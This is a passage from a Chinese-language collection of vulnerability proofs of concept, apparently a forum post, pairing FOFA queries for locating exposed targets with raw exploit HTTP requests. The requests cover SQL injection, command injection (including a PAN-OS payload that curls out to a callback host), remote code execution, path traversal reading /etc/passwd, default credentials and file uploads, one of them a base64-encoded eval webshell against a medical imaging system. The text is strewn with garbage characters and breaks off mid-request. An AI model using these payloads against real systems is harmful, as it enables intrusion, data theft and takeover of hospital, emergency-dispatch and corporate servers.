2 G* Y& m/ B4 I. gFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
% C5 I1 {- j' n- j, `3 ]4 n( pGET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1# ^; j2 [( c" \( r
Host: x.x.x.x
! j: K" {% H4 pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.03 T' n, g9 }" b X( ~- Y! j* H3 d: e8 u( j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 P' ^4 `/ F) {4 @
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 U- G+ m8 z- `! W- O# P( _Accept-Encoding: gzip, deflate, br
! u4 s6 l! w) B- ~9 @1 jConnection: close
% s. O1 ]8 d- J9 tCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
) q0 J6 f+ y1 m' z: \Upgrade-Insecure-Requests: 1
) @8 M( L7 l6 w5 @
) n/ |5 {2 v4 o- d# E* [; t% U8 x
5 j0 ]. D, }5 h) {7 k& j2 V140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入7 R; H/ p/ A# E; `, L9 k
CVE-2024-2566
9 X- L$ {9 U P' PFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"0 u! x" \8 G: J' a5 u. C
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
) U! G7 r, z" {' h& W: wHost: x.x.x.x
. @/ J9 P8 I7 T1 S% Y% U8 d; \8 KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
6 b2 Z+ a* Y' U( \0 CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8, ?1 j% e0 o1 P+ V! m. K
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 F* G+ h% I% g
Accept-Encoding: gzip, deflate, br- r) Q: S* Z" V3 q
Connection: close1 |2 T$ Y T' Y9 e7 q
Cookie: authcode=h8g9
; w# E$ p& `) x3 ^Upgrade-Insecure-Requests: 1
+ p" x3 p3 n+ V- f) C# f+ v- F8 Y* g# Q1 o1 a4 N9 H: _! V. z% j
% D; v% U1 v7 K' [, H) ~4 ]' P
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
1 \$ J$ k8 a* f1 g; `. OFOFA:body="指挥调度管理平台"
8 o, b- k: b1 @- c% UPOST /app/ext/ajax_users.php HTTP/1.13 W/ ~9 G3 j. B' y
Host: your-ip
4 I D) W+ A" ^; d9 \+ QUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
- x" v! S7 F5 @6 ~1 @( O8 BContent-Type: application/x-www-form-urlencoded! D% m5 F) s- p! O3 `( ]
( q7 f/ }1 K- {
* q5 c8 M$ L' N0 C2 ?. tdep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
8 t j; e+ H* D$ V& [% D
) j5 j, o# Q$ F8 S+ j$ v3 A
& I% l2 E& P6 m7 H142. CMSV6车辆监控平台系统中存在弱密码
- q3 @# U; J! m/ D3 bCVE-2024-29666# v, i' J8 P( ~( Y4 o) T1 A9 d( U
FOFA:body="/808gps/" ]# f/ G7 E3 n5 I3 H6 y5 p
admin/admin7 i6 _2 K) H, K& k0 y5 t
143. Netis WF2780 v2.1.40144 远程命令执行% L0 m* {' z' y% @/ j
CVE-2024-25850
' l' m9 a- d) E3 I1 RFOFA:title='AP setup' && header='netis'0 @0 @, c8 O+ V+ W2 n m
PAYLOAD
' d0 q) Y f, h% I! u
5 Q9 n( l6 C7 ?" ]144. D-Link nas_sharing.cgi 命令注入
" V9 X+ f! S1 N3 OFOFA:app="D_Link-DNS-ShareCenter"
: H/ @/ b0 X! l, H3 {7 Bsystem参数用于传要执行的命令
- _/ j9 B# {, w- h1 D' |: y+ ?0 z TGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
, W9 O# q1 }' g& _/ z6 |/ e0 WHost: x.x.x.x
( J; S" M3 x. ^User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0; `6 f/ H% C% h* Z2 ?/ k# d4 o
Connection: close8 G% R" f) S! b8 h& x7 x
Accept: */*
, t3 `! G$ j! }+ S h/ X5 j, VAccept-Language: en. |$ i. m0 _' I0 N- Z) @! o7 U
Accept-Encoding: gzip
/ M% k5 \* C, f9 T
% |7 ~. i+ b" ^ X0 ^+ v" U4 }# ] v3 j7 \2 M
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入. @ ?) x$ [( l
CVE-2024-3400
( f1 P! R4 v0 O2 a5 PFOFA:icon_hash="-631559155"
. B$ U& e6 ?! M+ X7 sGET /global-protect/login.esp HTTP/1.1- ?* `7 a( p# J1 v0 K5 ?) r
Host: 192.168.30.112:1005
! C( }7 S$ ?" m' ~5 r J0 _; [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
5 m5 ~6 ]# l v& k4 [' ?2 t- tConnection: close
3 D. d( s4 C) K& gCookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
# P* V7 Z/ D$ z% W3 X3 }Accept-Encoding: gzip
4 v" `9 j* v2 v" I) a- h6 n& K' [* |) j( l5 X! r
$ G* v6 r. r4 w146. MajorDoMo thumb.php 未授权远程代码执行
5 q5 \) i3 M+ w, E3 iCNVD-2024-021757 U. F- S% h/ `2 ~2 a! O7 f2 r$ z5 [
FOFA:app="MajordomoSL"
/ a3 F# @% m, a0 B: p6 ~% SGET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
, d1 x' N5 [5 ?) t. sHost: x.x.x.x5 t9 U% C. i" k7 V U% ]5 E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
' @0 [1 O% i8 _Accept-Charset: utf-8
) E$ B& C' S* m1 @0 ]* TAccept-Encoding: gzip, deflate: f) D# v B# ~/ k) g
Connection: close
" V/ x; N8 D$ Z6 Y/ W- L2 d# D) G/ @$ B! S; V
) g# h" B1 h" x
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
# d- G! C$ m3 Y! t- w+ y5 nCVE-2024-32399" N, N8 ]* Q0 Y& T( C
FOFA:body="RaidenMAILD"
6 J1 A' I1 |2 x5 D, W) iGET /webeditor/../../../windows/win.ini HTTP/1.1, i) O! N C/ N2 ^
Host: 127.0.0.1:81
9 Q1 v$ M" l) [9 i- ^: kCache-Control: max-age=0
/ h- n# D! Q3 Q. wConnection: close9 e C4 ^% u6 J0 A6 n/ Z1 ^0 ~
( z; q+ U( r, T0 `4 g# L0 y# R0 e8 d0 V0 M6 H! L5 N$ u
148. CrushFTP 认证绕过模板注入8 R, I( U* ~0 B) E, ~8 g4 r
CVE-2024-4040
. \! s( X z* `. j- c2 \7 O1 p, v7 KFOFA:body="CrushFTP"
& u5 z7 Q' H7 T2 W0 B, |6 IPAYLOAD
/ x9 Z4 Z5 a8 l5 L, C8 P$ D ]( [0 m( W: m7 G6 x. @
149. AJ-Report开源数据大屏存在远程命令执行
+ o- i. x) |9 b8 j$ OFOFA:title="AJ-Report": t& B+ l/ n- R8 V, g
7 `1 H" ?; ]: z1 ~# L' ePOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
5 l+ R i" E0 C* QHost: x.x.x.x
& q* c* H" J% U) i; {! }. `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.365 ~% O' S" Z4 P9 g. K8 i+ T" d4 c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: R4 N5 T7 I$ K8 p: H
Accept-Encoding: gzip, deflate, br, p. S+ v- q/ _$ Y9 G+ H
Accept-Language: zh-CN,zh;q=0.9
+ t2 x: P, z# n" L) H; D; L% AContent-Type: application/json;charset=UTF-8; ~7 { m4 e8 d1 c& v3 H
Connection: close
3 t/ m, M& p2 r/ h- P) J+ G3 i- X& U5 o; ?6 Y) Q3 r3 D
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
- D6 O. V; a: Q# M( F/ j5 K1 Z% {' w/ `7 i- j
150. AJ-Report 1.4.0 认证绕过与远程代码执行, z6 W% S) T D% L, n/ Y
FOFA:title="AJ-Report"
8 `# ]% L6 B$ y5 R4 TPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
6 ^$ n U0 ]9 S# `( fHost: x.x.x.x
Q+ }" s9 N0 c3 vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
5 l1 V8 \& R( Q8 u+ Q QAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
& Y. F7 a) L1 v! p2 U2 h' SAccept-Encoding: gzip, deflate, br: b i4 i; @8 z
Accept-Language: zh-CN,zh;q=0.9; U7 |' q( Z) v4 h/ H
Content-Type: application/json;charset=UTF-8. B; f& V6 s/ o q& N9 x0 A
Connection: close
" R( {4 {& J% e% UContent-Length: 3396 f5 U v4 C5 y
. [3 d! \+ N9 ^$ }- l' y6 o1 l' t
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
- H. F: ?+ P8 _* O2 ^* s
' }" M8 o9 S6 V+ ^0 Q) j
4 x+ J& W% V2 T9 U151. AJ-Report 1.4.1 pageList sql注入
5 c% c' q H* z9 lFOFA:title="AJ-Report"
0 Y4 z, d. D( @7 z2 JGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1/ ^7 ]9 |& \* j! ]. j6 }+ W" d0 p. w0 ]
Host: x.x.x.x6 }" T, c# D/ X+ i5 `& k5 L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
, a1 B. V0 g: C+ B2 t0 [2 lConnection: close w' G% t0 B# S. A7 I
Accept-Encoding: gzip7 G( V6 k2 b I4 v
9 Q: {% b2 X2 t7 f& q6 H
# g' Y) [- e: [9 m7 Z3 d* g3 e# O
152. Progress Kemp LoadMaster 远程命令执行
& _, ~8 j& e2 N' \6 Q9 \CVE-2024-1212
% h4 Q7 a( R4 M6 S/ p& MLoadMaster <= 7.2.59.2 (GA) S! g3 @6 R% ?. V# Q6 L
LoadMaster<=7.2.54.8 (LTSF)4 k1 `: j6 l# ^ s
LoadMaster <= 7.2.48.10 (LTS)
4 A; i2 @+ ~, d/ t5 C6 w+ zFOFA:body="LoadMaster"9 G1 f. o7 X3 d9 F
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码, I% g1 O8 D8 c5 r, @- x% g2 n
GET /access/set?param=enableapi&value=1 HTTP/1.1
- L' X' J+ H& @6 pHost: x.x.x.x7 O d1 ]( _# s% F% [ i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
/ P0 q8 r5 I0 \8 S3 ?Connection: close
" t1 s% c& X3 P& n* jAccept: */*# e5 {' ]( [( A0 ?& E, G
Accept-Language: en
# k' r8 K6 T7 cAuthorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=/ }) B( Z% s7 |& z
Accept-Encoding: gzip
$ H3 {2 d. L; h7 x+ c
% r& p$ u8 {" [% p/ O ?- p9 I+ `
% z H1 D3 m3 O5 X153. gradio任意文件读取
' R! F4 C8 Q2 Y- X, ]- lCVE-2024-1561FOFA:body="__gradio_mode__"$ l) }& |3 H( u& I- p; V$ k
第一步,请求/config文件获取componets的id
2 g$ E0 s C$ y! b6 W' f) o+ u. [http://x.x.x.x/config! f% I* q! Y" j( u9 {- v
% k- K2 [9 M$ m
4 d9 e5 D% I1 z4 t第二步,将/etc/passwd的内容写入到一个临时文件2 X% L9 ?6 [$ ?
POST /component_server HTTP/1.1
, A. n3 J& ?5 K$ G& S2 ZHost: x.x.x.x
. c/ N! P5 C; [6 D! C" JUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
- h/ x! B7 S/ W- f# B4 y# n* ?+ R% PConnection: close
2 J; f5 I9 J, _' Z% EContent-Length: 115
+ w- _5 g1 |( ~) j5 \Content-Type: application/json
, R g- \! [6 eAccept-Encoding: gzip/ E x, m: B( \- {
1 Q- ~0 x3 n u! E n. f' G% w{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}' _: G! Y* w3 z2 R8 H( w
4 \5 |1 Y0 r6 |7 u" u9 P$ n
: e, a; s& D3 N* a# e* j第三步访问# A) n1 F; C2 f6 N5 ^
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
- X( b& p6 B5 d
" y1 A4 D4 M/ g- x e2 a
/ O. O, u& Z8 y g' R154. 天维尔消防救援作战调度平台 SQL注入. Q7 B& C3 e4 A) }+ m
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
1 |0 u: D! f! ?, Q! g3 V" T0 kPOST /twms-service-mfs/mfsNotice/page HTTP/1.18 B5 h% \/ N, w$ C- {+ m
Host: x.x.x.x+ l2 ~4 \3 |5 L+ G
Content-Length: 106. F4 X6 l b4 \; x- Y
Cache-Control: max-age=0% z4 a% X: s) M5 |# |: ~
Upgrade-Insecure-Requests: 1
$ I3 t6 g1 b. GOrigin: http://x.x.x.x
9 S2 ^2 v9 d6 q9 AContent-Type: application/json
8 ^/ p8 F5 k X5 ]- ]9 IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
0 I) Y( ~0 I: z, UAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.73 P% o: A0 ]* f* n
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
* J$ y% Z8 A3 n1 g* _7 vAccept-Encoding: gzip, deflate
4 B* y9 d& _. Z2 z& A* { }, Y$ kAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
3 v7 {* y: [( @ j7 ?: r) M+ rConnection: close
* l3 N! a# q$ t/ T* M; x. u8 q0 V1 f9 a$ E/ n
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
% K; p; r% o7 K3 s; t# U$ c% ^+ O. R0 Q- V8 [
! ~; S' v& H6 Z: u- r, ]
155. 六零导航页 file.php 任意文件上传! ?! m1 B* Q$ i$ k
CVE-2024-34982
$ r4 l, p* b9 ?( QFOFA:title=="上网导航 - LyLme Spage"
7 ?& ^ x4 o6 F; u6 FPOST /include/file.php HTTP/1.1, F2 ]4 P! f* C
Host: x.x.x.x
0 g; o Y5 ]4 a$ [) c6 e3 \% qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.01 f+ _, g& ?/ }
Connection: close
% `7 F" m; C7 W G0 \- m& YContent-Length: 232
1 A6 K; w4 M1 a2 w: ZAccept: application/json, text/javascript, */*; q=0.019 L1 q5 M# |. c4 {2 M" |
Accept-Encoding: gzip, deflate, br! M5 s; |0 Z. l4 {1 C# Z6 ]1 T% [* m
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ o9 M0 G5 c2 G4 K( FContent-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f" g! s2 ^9 m. N. H. `: b! }
X-Requested-With: XMLHttpRequest
% @4 s0 W9 ?9 \2 d* M0 [
3 o7 v5 R* Q9 q! U3 f-----------------------------qttl7vemrsold314zg0f
- z2 x& J! }$ d; dContent-Disposition: form-data; name="file"; filename="test.php"5 g8 b6 |1 N, u# P0 m& x. L0 E
Content-Type: image/png4 u H2 V' [. B# G) T. P5 r" Q
$ ?0 f$ ?& h% n0 o' h Z<?php phpinfo();unlink(__FILE__);?>
$ ]5 u _% ?2 u) R& r! T# o; a-----------------------------qttl7vemrsold314zg0f--" l& r0 F* G( o$ M, D
) i1 Y7 o" [6 W$ V* q7 d
. t& M# @+ c3 v% e7 ]- e) u4 t访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
. L/ S) G* E% Y% ]
4 d* A1 [9 V6 M Y* ~156. TBK DVR-4104/DVR-4216 操作系统命令注入9 l( E, I9 e9 x4 j
CVE-2024-37210 C; N) W8 B7 G( v& @) m
FOFA:"Location: /login.rsp"+ j* h; w9 N( S3 q6 p$ m8 f
·TBK DVR-4104, a% }3 X, h- X* S6 [9 J. G
·TBK DVR-4216; o7 i1 o3 j8 `: \ u% f
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"- g+ n# ]) C% N- y
* U- q$ E; x0 g4 s e0 \, H8 [. l4 s8 {, L- O
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1# p# }5 x$ Y* P
Host: x.x.x.x
3 @) R) J& W% ]User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
; S. Q; I+ j' r, YConnection: close
; Q1 |4 u7 j3 e8 F& J% \9 IContent-Length: 0
: z- K( U! D) I5 V1 J& L0 V' uCookie: uid=1
% I) g- L5 B2 v! r rAccept-Encoding: gzip
- s8 j3 v/ \# z7 N7 O
7 P1 O' I9 a9 H: h3 V1 H& u3 P
! \ A2 z* p# s( K$ `' w* r157. 美特CRM upload.jsp 任意文件上传 |$ ^1 {9 V' X! p& S4 N$ q
CNVD-2023-06971: Q" c4 }% \- B3 H
FOFA:body="/common/scripts/basic.js"$ G) J, d4 |% p3 _# d& d
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
/ j! c6 P! e2 U- p* l& [Host: x.x.x.x
, V6 X7 a4 c; z6 P& VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
: ]# d! I5 d9 k8 x( |4 dContent-Length: 709
# I2 L9 x8 U. N7 p! lAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 O. y F+ H! [. S9 Z$ e) IAccept-Encoding: gzip, deflate
8 u q3 ~/ }$ m8 R) g) L& FAccept-Language: zh-CN,zh;q=0.92 P, }8 A" V+ \
Cache-Control: max-age=07 }( M& I' ^. ]; S
Connection: close& h0 Y! [; a7 D! F
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
5 [9 R0 g! q+ Z. q4 o( iUpgrade-Insecure-Requests: 1
( v/ q# a/ C3 @0 Y. Q- e4 w& M# [) u" b
------WebKitFormBoundary1imovELzPsfzp5dN3 l z3 p' l) m- U) w6 e3 z/ ?
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
/ U: x7 F4 f2 }0 B( O9 mContent-Type: application/octet-stream
( `: A' o' Z$ a" R3 ?; A" B' V; K: ^) }* {: e& ], [1 R7 }, o, K
nyhelxrutzwhrsvsrafb' F D7 n6 D5 z& Y7 @# G; L$ V. f
------WebKitFormBoundary1imovELzPsfzp5dN- e" ]" t! |7 f% ^4 N, D7 p
Content-Disposition: form-data; name="key"
/ q0 W8 A9 Z% A* s" t* C# ?+ g0 A7 w& b6 S2 F% W1 X& M
null
& i; K0 s* A- [& s0 d* S------WebKitFormBoundary1imovELzPsfzp5dN J2 a$ ?4 ]4 H0 W
Content-Disposition: form-data; name="form"
& V% U; v& |# f& J
% j7 R8 m; m( m( {null3 t7 _- O7 H, @# |, |8 Z* V( s
------WebKitFormBoundary1imovELzPsfzp5dN
# D/ H: m+ P1 d9 b. W7 b( m7 ?Content-Disposition: form-data; name="field"
/ ]: b5 [/ P" x+ @, [( o' z4 q0 x5 f9 ]4 @
null: E2 b l5 |/ h0 h
------WebKitFormBoundary1imovELzPsfzp5dN
6 G/ _5 t. a3 j- D% pContent-Disposition: form-data; name="filetitile"8 k4 O/ I! r; j1 z5 D$ r
: ?2 R d8 z+ c' i8 [. B; q8 x
null
; q- c X3 `0 k" X: K------WebKitFormBoundary1imovELzPsfzp5dN
3 P0 c a. o1 _' `1 eContent-Disposition: form-data; name="filefolder"
$ v5 t& Q/ y. [# Q: C9 Y6 Z
' _8 ?& V4 [' _' I# v( Qnull: ]. E5 N/ g$ V' t7 i" D
------WebKitFormBoundary1imovELzPsfzp5dN--' L8 z! C# D1 w) Z$ `1 V
( n8 L& i p$ |* {+ S* A8 a! s p/ {
+ Z5 Q6 g* q, J4 bhttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp! ^) \ h* }0 N. ?7 v8 ]( I
# Z3 o; z3 E! ^9 Q, u' z: B5 u158. Mura-CMS-processAsyncObject存在SQL注入
; ?% ?! J( g" Y8 ?& j. SCVE-2024-32640, y; [& Z) S6 R; m, @! t+ u5 M
FOFA:"Generator: Masa CMS"0 m/ K5 \! y1 P! h+ E; T
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1$ U- u2 X9 ~0 Q2 c! X& M
Host: {{Hostname}}
( |) p1 n) ?. H1 y! D! D' ~Content-Type: application/x-www-form-urlencoded
# X0 P4 d- Q( M0 e% o1 X+ z! g3 Y+ }$ m% ?5 c6 q) ?
object=displayregion&contenthistid=x\'&previewid=10 E% l* R- S! W3 t9 x
* a3 L1 v0 b$ h9 U9 @+ L7 \3 G
: H9 i8 j# i* @; c |159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
% z# W2 i1 Q, U6 bFOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
4 g& Y W( v7 s UPOST /webservices/WebJobUpload.asmx HTTP/1.1
6 S% w1 M- U5 n+ J- J+ MHost: x.x.x.x
9 C# C" Q0 V. o5 M, v' _! IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.362 F9 r* ^8 t5 E7 ^
Content-Length: 1080
" a& w# @& m: XAccept-Encoding: gzip, deflate
, d; H; ?4 c1 d- c2 tConnection: close+ i& m* T6 H: [; U! n
Content-Type: text/xml; charset=utf-8
5 b8 `8 T1 p+ K# ESoapaction: "http://rainier/jobUpload"
% }% Z2 K' k/ k1 f/ H6 P8 J' k9 h
$ x& c4 b! Z* S" C<?xml version="1.0" encoding="utf-8"?>
7 _! ]5 Z$ ^1 C t0 n2 j4 L<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
0 k# P/ E7 e/ o( T<soap:Body>' c' W1 ]& m3 n
<jobUpload xmlns="http://rainier">$ m. v! T/ _$ ^6 x& p. Q8 n
<vcode>1</vcode>
/ }/ y% \4 f8 J% W. Z<subFolder></subFolder>
$ `; S$ u+ A! p% \) T& \& ]<fileName>abcrce.asmx</fileName>: x; h0 }: w/ C
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>$ d" ~2 J. s7 b& S9 n2 y
</jobUpload>
7 e1 _1 S0 n: n4 `# C" i6 H</soap:Body>
; p# }# |( F c$ Y</soap:Envelope>
, u. @8 y8 Y; F. o" Z, A* H: K1 l' W: K7 A( v
# j: }7 D* E/ `$ }# M* t/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")5 z$ y& a1 T/ V9 o. g
0 {) ]. ?- X% E. [- S/ ]1 n+ f! \) G3 G F2 {0 {3 F6 {1 s
160. Sonatype Nexus Repository 3目录遍历与文件读取
2 \- C6 p& a# E# m: L4 bCVE-2024-49569 [# q3 h3 q5 X% M
FOFA:title="Nexus Repository Manager"
% N4 p1 ?' d& w. c$ b0 ^% KGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
7 q3 u) }) i7 P" o1 X. P: I* D2 SHost: x.x.x.x' Y" H$ j, `7 k$ Q9 i$ X
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0. T! k: u+ A3 t: \
Connection: close
4 y/ A/ i Q6 r' L- Q& m4 V$ NAccept: */*
3 G8 V- \' J, X% iAccept-Language: en* C: \+ a0 `# T) `) x$ U
Accept-Encoding: gzip. V; h) z. w0 G' c$ f8 h. s
1 E$ S6 J5 u3 a# {& Q
0 G4 h, Z9 O) r' M161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
3 D: d1 X4 f5 ]- {FOFA:body="/KT_Css/qd_defaul.css": x8 _" o0 ?* k6 I6 d( s/ M
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密: e6 z/ }" T) B5 A- L
POST /Webservice.asmx HTTP/1.1
: |2 \0 f, n7 c# p" m3 dHost: x.x.x.x
( b: o& ?1 I7 z. bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36. I$ X7 J% _9 i B
Connection: close
, \7 l0 W/ Y" G8 P' t: @' M) `Content-Length: 445% |- _, L3 v! S
Content-Type: text/xml
1 Y; ~: t. e5 s6 p6 w1 C. M1 XAccept-Encoding: gzip* }; d; M7 q8 \! X+ E: l) w
, X% z9 f) q; |2 `) _
<?xml version="1.0" encoding="utf-8"?>1 x1 p' D v( ]: C
<soap:Envelope xmlns:xsi="
$ a$ g: o; @9 Z, O6 _" mhttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
7 ]# Z% d% k1 b8 L$ p3 n) K" @& z5 Fxmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
: L T& Z) m4 \: J2 O<soap:Body>
